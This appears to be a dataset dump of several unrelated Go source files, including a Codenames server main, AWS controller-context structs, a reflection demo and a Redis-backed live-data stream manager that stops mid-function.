text stringlengths 11 4.05M |
|---|
package main
import (
"fmt"
"io/ioutil"
"log"
"math/rand"
"net/http"
"os"
"path/filepath"
"runtime/trace"
"time"
"github.com/cockroachdb/pebble"
"github.com/jbowens/codenames"
)
const listenAddr = ":9091"
const expiryDur = -24 * time.Hour
// main opens (creating if needed) a Pebble database, prunes and restores
// persisted games, optionally enables periodic execution tracing, and then
// serves the codenames HTTP server on listenAddr.
func main() {
	rand.Seed(time.Now().UnixNano())
	// Open a Pebble DB to persist games to disk.
	dir := os.Getenv("PEBBLE_DIR")
	if dir == "" {
		dir = filepath.Join(".", "db")
	}
	err := os.MkdirAll(dir, os.ModePerm)
	if err != nil {
		fmt.Fprintf(os.Stderr, "MkdirAll(%q): %s\n", dir, err)
		os.Exit(1)
	}
	log.Printf("[STARTUP] Opening pebble db from directory: %s\n", dir)
	db, err := pebble.Open(dir, nil)
	if err != nil {
		fmt.Fprintf(os.Stderr, "pebble.Open: %s\n", err)
		os.Exit(1)
	}
	defer db.Close()
	ps := &codenames.PebbleStore{DB: db}
	// Delete any games created too long ago.
	err = ps.DeleteExpired(time.Now().Add(expiryDur))
	if err != nil {
		// FIX: error message previously misspelled the method as "DeletedExpired".
		fmt.Fprintf(os.Stderr, "PebbleStore.DeleteExpired: %s\n", err)
		os.Exit(1)
	}
	go deleteExpiredPeriodically(ps)
	// Restore games from disk.
	games, err := ps.Restore()
	if err != nil {
		// FIX: error message previously misspelled the method as "Resore".
		fmt.Fprintf(os.Stderr, "PebbleStore.Restore: %s\n", err)
		os.Exit(1)
	}
	log.Printf("[STARTUP] Restored %d games from disk.\n", len(games))
	// Optional: write a runtime trace to TRACE dir, refreshed periodically.
	if traceDir := os.Getenv("TRACE"); len(traceDir) > 0 {
		log.Printf("[STARTUP] Traces enabled; storing most recent trace in %q", traceDir)
		go tracePeriodically(traceDir)
	}
	log.Printf("[STARTUP] Listening on addr %s\n", listenAddr)
	server := &codenames.Server{
		Server: http.Server{
			Addr: listenAddr,
		},
		Store: ps,
	}
	if err := server.Start(games); err != nil {
		fmt.Fprintf(os.Stderr, "error: %s\n", err)
	}
}
// deleteExpiredPeriodically prunes games older than the expiry window once
// an hour; failures are logged but do not stop the loop.
func deleteExpiredPeriodically(ps *codenames.PebbleStore) {
	for range time.Tick(time.Hour) {
		err := ps.DeleteExpired(time.Now().Add(expiryDur))
		if err != nil {
			// FIX: log message previously misspelled the method as "DeletedExpired".
			log.Printf("PebbleStore.DeleteExpired: %s\n", err)
		}
	}
}
// tracePeriodically refreshes the trace file at dst once per minute,
// overwriting it with a freshly captured trace each time.
func tracePeriodically(dst string) {
	ticker := time.NewTicker(time.Minute)
	for range ticker.C {
		takeTrace(dst)
	}
}
// takeTrace captures a 10-second runtime trace into a temp file and moves
// it to dst. The temp file is removed on every failure path (it previously
// leaked), and is closed before the rename so the data is flushed and the
// rename also works on platforms that disallow renaming open files.
func takeTrace(dst string) {
	f, err := ioutil.TempFile("", "trace")
	if err != nil {
		log.Printf("[TRACE] error creating temp file: %s", err)
		return
	}
	name := f.Name()
	err = trace.Start(f)
	if err != nil {
		log.Printf("[TRACE] error starting trace: %s", err)
		f.Close()
		os.Remove(name)
		return
	}
	<-time.After(10 * time.Second)
	trace.Stop()
	f.Close()
	err = os.Rename(name, dst)
	if err != nil {
		log.Printf("[TRACE] error renaming trace: %s", err)
		os.Remove(name)
	}
}
|
package main
// A Card represents a game card and everything that makes it different from other cards.
// To accommodate other games, new attributes could be added, like an image, an attack/defense value, etc.
type card struct {
	Code  string `json:"code"`  // identifier serialized as "code"
	Value string `json:"value"` // card value serialized as "value"
	Suit  string `json:"suit"`  // card suit serialized as "suit"
	// CardsetID string `json:"cardset_id"`
}
|
// DRUNKWATER TEMPLATE(add description and prototypes)
// Question Title and Description on leetcode.com
// Function Declaration and Function Prototypes on leetcode.com
//486. Predict the Winner
//Given an array of scores that are non-negative integers. Player 1 picks one of the numbers from either end of the array followed by the player 2 and then player 1 and so on. Each time a player picks a number, that number will not be available for the next player. This continues until all the scores have been chosen. The player with the maximum score wins.
//Given an array of scores, predict whether player 1 is the winner. You can assume each player plays to maximize his score.
//Example 1:
//Input: [1, 5, 2]
//Output: False
//Explanation: Initially, player 1 can choose between 1 and 2.
//If he chooses 2 (or 1), then player 2 can choose from 1 (or 2) and 5. If player 2 chooses 5, then player 1 will be left with 1 (or 2).
//So, final score of player 1 is 1 + 2 = 3, and player 2 is 5.
//Hence, player 1 will never be the winner and you need to return False.
//Example 2:
//Input: [1, 5, 233, 7]
//Output: True
//Explanation: Player 1 first chooses 1. Then player 2 has to choose between 5 and 7. No matter which number player 2 chooses, player 1 can choose 233.
//Finally, player 1 has more score (234) than player 2 (12), so you need to return True representing player1 can win.
//Note:
//1 <= length of the array <= 20.
//Any scores in the given array are non-negative integers and will not exceed 10,000,000.
//If the scores of both players are equal, then player 1 is still the winner.
//func PredictTheWinner(nums []int) bool {
//}
// Time Is Money |
package cmd
const (
	// ConfigFlag is the name of the command-line flag that selects the
	// configuration file.
	ConfigFlag = "config"
)
|
package controllercontext
import "github.com/aws/aws-sdk-go/service/ec2"
// ContextStatus aggregates the observed state of both the control plane
// and the tenant cluster for the current reconciliation context.
type ContextStatus struct {
	ControlPlane  ContextStatusControlPlane
	TenantCluster ContextStatusTenantCluster
}

// ContextStatusControlPlane holds control-plane-side AWS state.
type ContextStatusControlPlane struct {
	AWSAccountID string
	NATGateway   ContextStatusControlPlaneNATGateway
	RouteTable   ContextStatusControlPlaneRouteTable
	PeerRole     ContextStatusControlPlanePeerRole
	VPC          ContextStatusControlPlaneVPC
}

// ContextStatusControlPlaneNATGateway lists the NAT gateway addresses of
// the control plane.
type ContextStatusControlPlaneNATGateway struct {
	Addresses []*ec2.Address
}

// ContextStatusControlPlaneRouteTable carries control plane route table
// lookups.
type ContextStatusControlPlaneRouteTable struct {
	// Mappings are key value pairs of control plane route table names and their
	// IDs, where the map keys are route table names and the map values are route
	// table IDs. The mapping is managed by the routetable resource.
	Mappings map[string]string
}

// ContextStatusControlPlanePeerRole identifies the IAM role used for VPC
// peering.
type ContextStatusControlPlanePeerRole struct {
	ARN string
}

// ContextStatusControlPlaneVPC describes the control plane VPC.
type ContextStatusControlPlaneVPC struct {
	CIDR string
}

// ContextStatusTenantCluster holds tenant-cluster-side state.
type ContextStatusTenantCluster struct {
	AWSAccountID          string
	Encryption            ContextStatusTenantClusterEncryption
	HostedZoneNameServers string
	MasterInstance        ContextStatusTenantClusterMasterInstance
	TCCP                  ContextStatusTenantClusterTCCP
	VersionBundleVersion  string
	WorkerInstance        ContextStatusTenantClusterWorkerInstance
}

// ContextStatusTenantClusterEncryption carries the tenant cluster
// encryption key.
type ContextStatusTenantClusterEncryption struct {
	Key string
}

// ContextStatusTenantClusterMasterInstance describes the master node
// instance configuration.
type ContextStatusTenantClusterMasterInstance struct {
	DockerVolumeResourceName string
	Image                    string
	ResourceName             string
	Type                     string
	CloudConfigVersion       string
}

// ContextStatusTenantClusterTCCP describes the tenant cluster control
// plane (TCCP) stack resources.
type ContextStatusTenantClusterTCCP struct {
	ASG             ContextStatusTenantClusterTCCPASG
	IsTransitioning bool
	RouteTables     []*ec2.RouteTable
	Subnets         []*ec2.Subnet
	VPC             ContextStatusTenantClusterTCCPVPC
}

// ContextStatusTenantClusterTCCPVPC identifies the tenant VPC and its
// peering connection.
type ContextStatusTenantClusterTCCPVPC struct {
	ID                  string
	PeeringConnectionID string
}

// ContextStatusTenantClusterWorkerInstance describes the worker node
// instance configuration.
type ContextStatusTenantClusterWorkerInstance struct {
	DockerVolumeSizeGB string
	CloudConfigVersion string
	Image              string
	Type               string
}
|
package basic
import (
"fmt"
"reflect"
)
// User is a small demo struct used to exercise reflection over fields and
// methods. Fields are unexported, so reflection can read but not set them.
type User struct {
	id   int
	name string
}
// Memfunc is a no-argument demo method invoked via reflection.
func (u User) Memfunc() {
	fmt.Print("memfunc\n")
}
// MemfuncWitshargs is a one-argument demo method invoked via reflection.
// (Name misspelling is preserved: it is part of the exported interface.)
func (u User) MemfuncWitshargs(i int) {
	// Println inserts a separator space between operands, hence two spaces.
	fmt.Printf("MemfuncWitshargs :  %d\n", i)
}
// reflect1 dumps the fields and methods of any via the reflect package and
// demonstrates invoking the first two methods through reflection.
// It assumes any is a struct value — NumField panics otherwise.
func reflect1(any interface{}) {
	fmt.Printf("interface{}=%#v \n\n", any)
	type1 := reflect.TypeOf(any)
	fmt.Printf("reflect.TypeOf(any)=%v \n\n", type1)
	value := reflect.ValueOf(any)
	fmt.Printf("reflect.ValueOf(any)=%v \n\n", value)
	// Enumerate the struct's fields: type, name, and current value.
	for i := 0; i < type1.NumField(); i++ {
		field := type1.Field(i)
		value1 := value.Field(i)
		/*
			if i == 0 {
				newValue := value1.Elem()
				newValue.SetInt(100)
			}
		*/
		fmt.Printf("for %d, field.Type=%v, field.Name=%v, value1=%v \n", i, field.Type, field.Name, value1)
	}
	fmt.Println("\n")
	// Enumerate the method set and call the first two methods.
	for i := 0; i < type1.NumMethod(); i++ {
		method := type1.Method(i)
		fmt.Printf("method.Type=%v, method.Name=%v \n", method.Type, method.Name)
		//fmt.Println(type1.NumIn())
		if i == 0 {
			// Invoke a reflected method that takes no arguments.
			methodValue := value.MethodByName(method.Name)
			args := make([]reflect.Value, 0)
			/*
				Call always requires an argument slice, even when the
				reflected method has no parameters.
			*/
			methodValue.Call(args)
		} else if i == 1 {
			// Invoke a reflected method with one int argument.
			methodValue := value.MethodByName(method.Name)
			args := []reflect.Value{reflect.ValueOf(50)}
			methodValue.Call(args)
		}
	}
}
// Testreflect builds a sample User, runs the reflection demo on it, and
// prints the value before and after to show it is unchanged.
func Testreflect() {
	u := User{1, "abc"}
	fmt.Printf("user: %#v \n", u)
	reflect1(u)
	fmt.Printf("after reflect1 user: %#v \n", u)
}
// Reflect is the package entry point for the reflection demo; it wraps
// Testreflect in banner lines.
func Reflect(){
fmt.Println("<------------------------------Reflect begin ------------->")
Testreflect()
fmt.Println("\n<------------------------------Reflect end ------------->")
}
// Copyright 2019 Radiation Detection and Imaging (RDI), LLC
// Use of this source code is governed by the BSD 3-clause
// license that can be found in the LICENSE file.
package live
import (
"context"
"fmt"
"log"
"net/url"
"strconv"
"strings"
"time"
"github.com/rditech/rdi-live/data"
"github.com/rditech/rdi-live/live/message"
"github.com/rditech/rdi-live/live/shows"
"github.com/rditech/rdi-live/model/rdi/slowdata"
"github.com/go-redis/redis"
"github.com/golang/protobuf/proto"
"github.com/google/uuid"
"github.com/proio-org/go-proio"
)
// ShowInfo tracks one live show: the show object, the cancel function that
// stops its goroutines, and the channel samples are pushed into.
type ShowInfo struct {
	Show          interface{}
	Cancel        context.CancelFunc
	SampleChannel chan<- interface{}
}

// ShowType enumerates the kinds of plots a source can feed.
type ShowType int

const (
	Projection ShowType = iota
	RollXY
	XY
	Hist2D
)

// SourceType distinguishes normal sources from advanced ones.
type SourceType int

const (
	Normal SourceType = iota
	Advanced
)

// SourceInfo describes one named data source, the shows subscribed to it,
// and which show types it can feed.
type SourceInfo struct {
	Name        string
	ShowIds     []uuid.UUID
	CompatShows []ShowType
	Type        SourceType
}

// StreamManager owns one event stream's lifecycle: show and source
// registries, optional run recording, and pub/sub command handling.
type StreamManager struct {
	Namespace       string
	Name            string
	Redis           *redis.Client
	Addr            string
	InitShows       func(*StreamManager)                // optional hook run once at Manage start
	GenerateSources func(*StreamManager, *proio.Event) // per-event source extraction
	CleanupRunData  []data.EventProcessor               // applied to events before recording
	Metadata        map[string]string
	// Internal state, owned by the Manage loop.
	ctx                      context.Context
	showInfo                 map[uuid.UUID]ShowInfo
	sourceInfo               map[string]*SourceInfo
	runChannel               chan *proio.Event // nil when no run is recording; nil event is the stop sentinel
	runFilename              string
	doPubDesc                bool
	lastTempMeta, lastHvMeta []byte // last-seen metadata buffers, compared by pointer identity
	startTime                time.Time
}
// Manage is the stream's main loop: it forwards events from input to
// output, feeds an optional run recorder, and services pub/sub commands
// until the input yields nil or a "kill" command arrives.
func (m *StreamManager) Manage(input <-chan *proio.Event, output chan<- *proio.Event) {
	var cancel context.CancelFunc
	m.ctx, cancel = context.WithCancel(context.Background())
	defer cancel()
	defer m.rmAllShows(&message.Cmd{})
	// Lazily initialize the registries so a zero-value manager works.
	if m.sourceInfo == nil {
		m.sourceInfo = make(map[string]*SourceInfo)
	}
	if m.showInfo == nil {
		m.showInfo = make(map[uuid.UUID]ShowInfo)
	}
	if m.InitShows != nil {
		m.InitShows(m)
	}
	cmds := message.ReceivePubSubCmds(m.ctx, m.Addr, m.Namespace+" stream cmd "+m.Name)
	m.announce()
	defer m.closeStream()
	m.startTime = time.Now()
	for {
		select {
		case event := <-input:
			// A nil event signals end of input.
			if event == nil {
				return
			}
			m.handleMetadata(event)
			m.GenerateSources(m, event)
			if m.runChannel != nil {
				// Non-blocking send: drop the event for the recorder
				// rather than stall the live stream.
				select {
				case m.runChannel <- event:
				default:
				}
			}
			output <- event
		case cmd := <-cmds:
			if cmd.Command == "kill" {
				return
			}
			m.execute(cmd)
		}
	}
}
// GetSourceInfo returns the SourceInfo registered under source, creating
// and registering an empty entry on first use.
func (m *StreamManager) GetSourceInfo(source string) *SourceInfo {
	if info, ok := m.sourceInfo[source]; ok {
		return info
	}
	info := &SourceInfo{Name: source}
	m.sourceInfo[source] = info
	return info
}
// HandleSource routes one sample (passed as pointers/slices in value) to
// every show subscribed to sourceInfo. The arity and concrete types select
// the show kind: three *float32 -> Hist2D; (*float64, *float32) -> RollXY;
// two *float32 -> XY; a []float32 in value[0] -> Projection. The first
// sample seen also registers the source's compatible show list.
func (m *StreamManager) HandleSource(sourceInfo *SourceInfo, t SourceType, value ...interface{}) {
	if len(value) == 0 || sourceInfo == nil {
		return
	}
	if sourceInfo.Type != t {
		sourceInfo.Type = t
	}
	if len(value) == 3 {
		val0f, ok0f := value[0].(*float32)
		val1f, ok1f := value[1].(*float32)
		val2f, ok2f := value[2].(*float32)
		if ok0f && ok1f && ok2f {
			// First sample: advertise this source as Hist2D-compatible.
			if sourceInfo.CompatShows == nil {
				sourceInfo.CompatShows = []ShowType{Hist2D}
				m.listSource(sourceInfo.Name, sourceInfo)
			}
			for _, showId := range sourceInfo.ShowIds {
				showInfo := m.showInfo[showId]
				show := showInfo.Show
				switch show.(type) {
				case *shows.Hist2D:
					showInfo.SampleChannel <- &shows.Hist2DSample{
						float64(*val0f),
						float64(*val1f),
						float64(*val2f),
					}
				}
			}
		}
	} else if len(value) == 2 {
		val0d, ok0d := value[0].(*float64)
		val0f, ok0f := value[0].(*float32)
		val1f, ok1f := value[1].(*float32)
		if ok0d && ok1f {
			// (float64, float32) pairs feed rolling XY plots.
			if sourceInfo.CompatShows == nil {
				sourceInfo.CompatShows = []ShowType{RollXY}
				m.listSource(sourceInfo.Name, sourceInfo)
			}
			for _, showId := range sourceInfo.ShowIds {
				showInfo := m.showInfo[showId]
				show := showInfo.Show
				switch show.(type) {
				case *shows.RollXY:
					showInfo.SampleChannel <- &shows.RollXYSample{
						*val0d,
						float64(*val1f),
						sourceInfo.Name,
					}
				}
			}
		} else if ok0f && ok1f {
			// (float32, float32) pairs feed plain XY plots.
			if sourceInfo.CompatShows == nil {
				sourceInfo.CompatShows = []ShowType{XY}
				m.listSource(sourceInfo.Name, sourceInfo)
			}
			for _, showId := range sourceInfo.ShowIds {
				showInfo := m.showInfo[showId]
				show := showInfo.Show
				switch show.(type) {
				case *shows.XY:
					showInfo.SampleChannel <- &shows.XYSample{
						float64(*val0f),
						float64(*val1f),
						sourceInfo.Name,
					}
				}
			}
		}
	}
	// Regardless of arity, a []float32 first value feeds projection shows.
	valArray, okArray := value[0].([]float32)
	if okArray {
		if sourceInfo.CompatShows == nil {
			sourceInfo.CompatShows = []ShowType{Projection}
			m.listSource(sourceInfo.Name, sourceInfo)
		}
		for _, showId := range sourceInfo.ShowIds {
			showInfo := m.showInfo[showId]
			show := showInfo.Show
			switch show.(type) {
			case *shows.Projection:
				showInfo.SampleChannel <- &shows.ProjectionSample{
					valArray,
					sourceInfo.Name,
				}
			}
		}
	}
}
// announce publishes a "stream announce" message carrying this stream's
// name on the namespace-wide broadcast channel.
func (m *StreamManager) announce() {
	msg := &message.Msg{
		Type:     "stream announce",
		Metadata: map[string]string{"name": m.Name},
	}
	if err := message.PublishJsonMsg(m.Redis, m.Namespace+" broadcast", msg); err != nil {
		log.Println(err)
	}
}
// closeStream publishes a "stream close" message for this stream on the
// namespace-wide broadcast channel.
func (m *StreamManager) closeStream() {
	msg := &message.Msg{
		Type:     "stream close",
		Metadata: map[string]string{"name": m.Name},
	}
	if err := message.PublishJsonMsg(m.Redis, m.Namespace+" broadcast", msg); err != nil {
		log.Println(err)
	}
}
// execute dispatches a received command to the matching handler; unknown
// commands are logged and otherwise ignored.
func (m *StreamManager) execute(cmd *message.Cmd) {
	// cmd.Command is switched on with string cases below, so the previous
	// string(...) conversion in the log call was redundant.
	log.Println("StreamManager:", cmd.Command)
	switch cmd.Command {
	case "new show":
		m.newShow(cmd)
	case "map source":
		m.mapSource(cmd)
	case "rm show":
		m.rmShow(cmd)
	case "rm all shows":
		m.rmAllShows(cmd)
	case "show cmd":
		m.showCmd(cmd)
	case "pub all shows":
		m.pubAllShows(cmd)
	case "list all sources":
		m.listAllSources(cmd)
	case "start run":
		m.startRun(cmd)
	case "stop run":
		m.stopRun(cmd)
	case "pub run meta":
		m.pubRunMeta(cmd)
	case "pub desc":
		m.pubDesc(cmd)
	}
}
// newShow creates a show of the kind named in cmd's "type" metadata,
// registers it, starts its frame-publisher and sample-consumer goroutines,
// then maps it to the requested sources and applies initial parameters.
func (m *StreamManager) newShow(cmd *message.Cmd) {
	var show shows.Show
	var period time.Duration
	// Optional frame period in nanoseconds; defaults to 50ms, floored at 10ms.
	if v, ok := cmd.Metadata["period"]; ok {
		ns, err := strconv.Atoi(v)
		if err == nil {
			period = time.Duration(ns)
		}
	}
	if period == 0 {
		period = 50 * time.Millisecond
	} else if period < 10*time.Millisecond {
		period = 10 * time.Millisecond
	}
	// Unknown show types are silently ignored.
	switch cmd.Metadata["type"] {
	case "Histogram 2D":
		plot := &shows.Hist2D{FramePeriod: period}
		plot.InitPlot()
		show = plot
	case "XY":
		plot := &shows.XY{FramePeriod: period}
		plot.InitPlot()
		show = plot
	case "Roll XY":
		plot := &shows.RollXY{FramePeriod: period}
		plot.InitPlot()
		show = plot
	case "Projection":
		plot := &shows.Projection{FramePeriod: period}
		plot.InitPlot()
		show = plot
	default:
		return
	}
	ctx, cancel := context.WithCancel(m.ctx)
	showId := uuid.New()
	idString := showId.String()
	channel := make(chan interface{}, 10000)
	showInfo := ShowInfo{
		Show:          show,
		Cancel:        cancel,
		SampleChannel: channel,
	}
	m.showInfo[showId] = showInfo
	// Frame pusher: publishes a frame whenever the frame count advances and
	// announces "show close" once the context is cancelled.
	go func() {
		log.Println("starting show", idString, "frame pusher")
		defer log.Println("stopped show", idString, "frame pusher")
		defer func() {
			msg := &message.Msg{
				Type:     "show close",
				Metadata: make(map[string]string),
			}
			msg.Metadata["stream"] = m.Name
			msg.Metadata["show id"] = idString
			message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
		}()
		show.UpdateFrame()
		var lastFrameCount uint64
		for {
			select {
			case <-ctx.Done():
				return
			default:
			}
			frame, frameCount := show.Frame()
			if frameCount != lastFrameCount {
				frame.Type = "show frame"
				frame.Metadata["show id"] = idString
				frame.Metadata["stream name"] = m.Name
				if err := message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, frame); err != nil {
					log.Println(err)
				}
				time.Sleep(period)
			} else {
				// No new frame yet; poll again shortly.
				time.Sleep(1 * time.Millisecond)
			}
			lastFrameCount = frameCount
		}
	}()
	// Sample getter: drains the sample channel into the show until cancelled.
	go func() {
		log.Println("starting show", idString, "sample getter")
		defer log.Println("stopped show", idString, "sample getter")
		defer close(channel)
		for {
			select {
			case <-ctx.Done():
				return
			case sample := <-channel:
				show.AddSample(sample)
			}
		}
	}()
	// Reuse the same command to map sources and set initial parameters.
	cmd.Metadata["show id"] = idString
	m.mapSource(cmd)
	cmd.Metadata["show cmd"] = "set params"
	m.showCmd(cmd)
}
// mapSource subscribes the show named by cmd's "show id" metadata to each
// comma-separated source in cmd's "source" metadata, creating source
// entries on demand and skipping duplicate mappings.
func (m *StreamManager) mapSource(cmd *message.Cmd) {
	source := cmd.Metadata["source"]
	if len(source) == 0 {
		return
	}
	if idString, ok := cmd.Metadata["show id"]; ok {
		// An unparsable id yields the zero UUID, rejected by the existence
		// check below.
		showId, _ := uuid.Parse(idString)
		if _, ok := m.showInfo[showId]; !ok {
			return
		}
		for _, source := range strings.Split(source, ",") {
			source = strings.TrimSpace(source)
			sourceInfo, sourceInfoOk := m.sourceInfo[source]
			if !sourceInfoOk {
				sourceInfo = &SourceInfo{Name: source}
			}
			// Don't map the same show to a source twice.
			mapped := false
			for _, thisId := range sourceInfo.ShowIds {
				if thisId == showId {
					mapped = true
					break
				}
			}
			if !mapped {
				sourceInfo.ShowIds = append(sourceInfo.ShowIds, showId)
			}
			if !sourceInfoOk {
				m.sourceInfo[source] = sourceInfo
			}
		}
	}
}
// rmShow cancels and unregisters the show named by cmd's "show id"
// metadata and removes its id from every source's subscription list.
func (m *StreamManager) rmShow(cmd *message.Cmd) {
	var showId uuid.UUID
	if idString, ok := cmd.Metadata["show id"]; ok {
		showId, _ = uuid.Parse(idString)
		if info, ok := m.showInfo[showId]; ok {
			info.Cancel()
			delete(m.showInfo, showId)
		}
	}
	// Filter showId out of each source's list in place, reusing the
	// backing array.
	for _, sourceInfo := range m.sourceInfo {
		list := sourceInfo.ShowIds
		tmp := list[:0]
		for i := range list {
			if list[i] != showId {
				tmp = append(tmp, list[i])
			}
		}
		sourceInfo.ShowIds = tmp
	}
}
// rmAllShows cancels every active show, resets the show registry, and
// detaches all shows from their sources.
func (m *StreamManager) rmAllShows(cmd *message.Cmd) {
	for id := range m.showInfo {
		m.showInfo[id].Cancel()
	}
	m.showInfo = make(map[uuid.UUID]ShowInfo)
	for _, src := range m.sourceInfo {
		src.ShowIds = nil
	}
}
// showCmd forwards a sub-command (named in the "show cmd" metadata) to the
// show identified by "show id", stripping the routing keys before delivery.
func (m *StreamManager) showCmd(cmd *message.Cmd) {
	if idString, ok := cmd.Metadata["show id"]; ok {
		showId, _ := uuid.Parse(idString)
		cmd.Command = cmd.Metadata["show cmd"]
		if info, ok := m.showInfo[showId]; ok {
			delete(cmd.Metadata, "show id")
			delete(cmd.Metadata, "show cmd")
			// Shows are expected to implement message.Executer; a
			// non-conforming show would panic here.
			e := info.Show.(message.Executer)
			e.Execute(cmd)
		}
	}
}
// pubAllShows bumps every registered show's frame count so each frame
// pusher republishes its current frame.
func (m *StreamManager) pubAllShows(cmd *message.Cmd) {
	for _, info := range m.showInfo {
		info.Show.(shows.Show).UpdateFrameCount()
	}
}
// listAllSources re-announces every registered source.
func (m *StreamManager) listAllSources(*message.Cmd) {
	for name, info := range m.sourceInfo {
		m.listSource(name, info)
	}
}
// listSource publishes a "source announce" message describing one source:
// its name, the show types it can feed, and its source type.
func (m *StreamManager) listSource(source string, sourceInfo *SourceInfo) {
	msg := &message.Msg{
		Type:     "source announce",
		Metadata: make(map[string]string),
	}
	msg.Metadata["stream"] = m.Name
	msg.Metadata["source"] = source
	// Human-readable, comma-separated list of compatible show names.
	labels := make([]string, 0, len(sourceInfo.CompatShows))
	for _, showType := range sourceInfo.CompatShows {
		var label string
		switch showType {
		case Hist2D:
			label = "Histogram 2D"
		case XY:
			label = "XY"
		case RollXY:
			label = "Roll XY"
		case Projection:
			label = "Projection"
		}
		labels = append(labels, label)
	}
	msg.Metadata["compat shows"] = strings.Join(labels, ", ")
	msg.Metadata["type"] = map[SourceType]string{
		Normal:   "Normal",
		Advanced: "Advanced",
	}[sourceInfo.Type]
	message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
}
// RunDateFormat is the reference-time layout used to timestamp run filenames.
var RunDateFormat = "2006_Jan2_15_04_05_UTC"

// startRun begins recording the event stream to a timestamped .proio file
// under the URL in cmd's "url" metadata. It publishes run status plus a
// 100ms run-time ticker, and records until stopRun sends the nil sentinel.
func (m *StreamManager) startRun(cmd *message.Cmd) {
	urlString := cmd.Metadata["url"] + "/" + time.Now().UTC().Format(RunDateFormat) + ".proio"
	writer, err := data.GetWriter(m.ctx, urlString, cmd.Metadata["credentials"])
	if err != nil {
		log.Println(err)
		return
	}
	thisUrl, err := url.Parse(urlString)
	if err != nil {
		// FIX: this error was previously ignored, so a malformed URL made
		// thisUrl nil and panicked below. Close the writer and bail out.
		log.Println(err)
		writer.Close()
		return
	}
	m.runFilename = strings.TrimLeft(thisUrl.Path, "/")
	// Terminate any run already in progress before starting a new one.
	if m.runChannel != nil {
		m.runChannel <- nil
	}
	m.runChannel = make(chan *proio.Event, 10000)
	log.Printf("starting run %v://%v/%v", thisUrl.Scheme, thisUrl.Host, m.runFilename)
	writer.SetCompression(proio.LZ4)
	// Record the remaining command metadata with the run, minus the
	// routing keys.
	delete(cmd.Metadata, "credentials")
	delete(cmd.Metadata, "url")
	for key, value := range cmd.Metadata {
		writer.PushMetadata(key, []byte(value))
	}
	msg := &message.Msg{
		Type:     "stream status",
		Metadata: make(map[string]string),
	}
	msg.Metadata["stream"] = m.Name
	msg.Metadata["Run"] = m.runFilename
	message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
	ctx, cancel := context.WithCancel(m.ctx)
	go func() {
		defer writer.Close()
		// Status ticker: publishes the elapsed run time every 100ms until
		// the run is cancelled.
		go func() {
			start := time.Now()
			for {
				time.Sleep(100 * time.Millisecond)
				select {
				case <-ctx.Done():
					return
				default:
				}
				msg := &message.Msg{
					Type:     "stream status",
					Metadata: make(map[string]string),
				}
				msg.Metadata["stream"] = m.Name
				msg.Metadata["Run Time"] = fmt.Sprintf("%v", time.Since(start).Truncate(100*time.Millisecond))
				message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
			}
		}()
		defer cancel()
		defer log.Printf("stopping run %v://%v/%v", thisUrl.Scheme, thisUrl.Host, m.runFilename)
		// Writer loop: a nil event is the stop sentinel.
		for event := range m.runChannel {
			if event == nil {
				return
			}
			// Strip the run metadata keys from each event before writing.
			for key := range cmd.Metadata {
				delete(event.Metadata, key)
			}
			for _, proc := range m.CleanupRunData {
				proc(event)
			}
			writer.Push(event)
		}
	}()
}
// stopRun ends any in-progress recording by sending the nil sentinel to
// the run writer goroutine, then clears the channel reference.
func (m *StreamManager) stopRun(cmd *message.Cmd) {
	log.Printf("stopping run")
	if ch := m.runChannel; ch != nil {
		ch <- nil
	}
	m.runChannel = nil
}
// pubRunMeta is a placeholder for the "pub run meta" command; it is
// currently a no-op.
func (m *StreamManager) pubRunMeta(cmd *message.Cmd) {
}
// pubDesc arms a one-shot flag; the next event processed by handleMetadata
// publishes the stream's description.
func (m *StreamManager) pubDesc(cmd *message.Cmd) {
	m.doPubDesc = true
}
// handleMetadata publishes stream-status updates derived from an event's
// metadata: a one-shot description (armed by pubDesc), plus "Temp" and
// "HV" slow-data blocks, whose readings are also fanned out as plot sources.
func (m *StreamManager) handleMetadata(event *proio.Event) {
	if m.doPubDesc {
		m.doPubDesc = false
		msg := &message.Msg{
			Type:     "stream status",
			Metadata: make(map[string]string),
		}
		msg.Metadata["stream"] = m.Name
		msg.Metadata["Description"] = string(event.Metadata["Description"])
		message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
	}
	tempMeta := event.Metadata["Temp"]
	// Pointer identity of the first byte is used to detect a fresh metadata
	// buffer — assumes the producer reuses the same slice until the data
	// changes; TODO confirm against the proio source.
	if len(tempMeta) > 0 && (m.lastTempMeta == nil || &tempMeta[0] != &m.lastTempMeta[0]) {
		m.lastTempMeta = tempMeta
		t := &slowdata.Temp{}
		err := proto.Unmarshal(tempMeta, t)
		if err == nil {
			msg := &message.Msg{
				Type:     "stream status",
				Metadata: make(map[string]string),
			}
			msg.Metadata["stream"] = m.Name
			msg.Metadata["Temp"] = t.String()
			message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
		}
		// NOTE(review): the loops below run even when Unmarshal failed; t
		// is then empty/partial so they are likely no-ops — confirm intended.
		tStamp := float64(time.Since(m.startTime).Nanoseconds()) / 1e9
		for i, val := range t.Som {
			temp := m.GetSourceInfo(fmt.Sprintf("SoM %d Temp", i))
			m.HandleSource(temp, Advanced, &tStamp, &val)
		}
		for i, val := range t.Fem {
			temp := m.GetSourceInfo(fmt.Sprintf("FEM %d Temp", i))
			m.HandleSource(temp, Advanced, &tStamp, &val)
		}
		for i, val := range t.Board {
			temp := m.GetSourceInfo(fmt.Sprintf("Board Temp %d", i))
			m.HandleSource(temp, Advanced, &tStamp, &val)
		}
	}
	hvMeta := event.Metadata["HV"]
	// Same pointer-identity freshness check as for "Temp" above.
	if len(hvMeta) > 0 && (m.lastHvMeta == nil || &hvMeta[0] != &m.lastHvMeta[0]) {
		m.lastHvMeta = hvMeta
		t := &slowdata.Hv{}
		err := proto.Unmarshal(hvMeta, t)
		if err == nil {
			msg := &message.Msg{
				Type:     "stream status",
				Metadata: make(map[string]string),
			}
			msg.Metadata["stream"] = m.Name
			msg.Metadata["HV"] = t.String()
			message.PublishJsonMsg(m.Redis, m.Namespace+" stream "+m.Name, msg)
		}
		tStamp := float64(time.Since(m.startTime).Nanoseconds()) / 1e9
		for i, val := range t.DacValue {
			dacval := m.GetSourceInfo(fmt.Sprintf("DAC %d Value", i))
			floatVal := float32(val)
